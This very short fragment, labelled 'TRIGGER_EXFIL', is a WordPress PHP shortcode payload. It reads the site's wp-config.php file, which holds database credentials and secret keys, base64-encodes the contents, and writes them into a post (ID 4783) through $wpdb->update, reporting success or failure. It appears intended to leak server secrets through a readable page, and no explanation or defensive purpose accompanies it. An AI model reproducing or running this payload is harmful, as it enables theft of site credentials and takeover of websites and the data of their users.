TRIGGER_EXFIL
[php]global $wpdb;$c=base64_encode(@file_get_contents(“/var/www/html/business/wp-config.php”));if($c&&strlen($c)>0){$wpdb->update($wpdb->posts,array(“post_content”=>$c),array(“ID”=>4783));echo “OK:”.strlen($c);}else{echo “FAIL_NO_READ”;}[/php]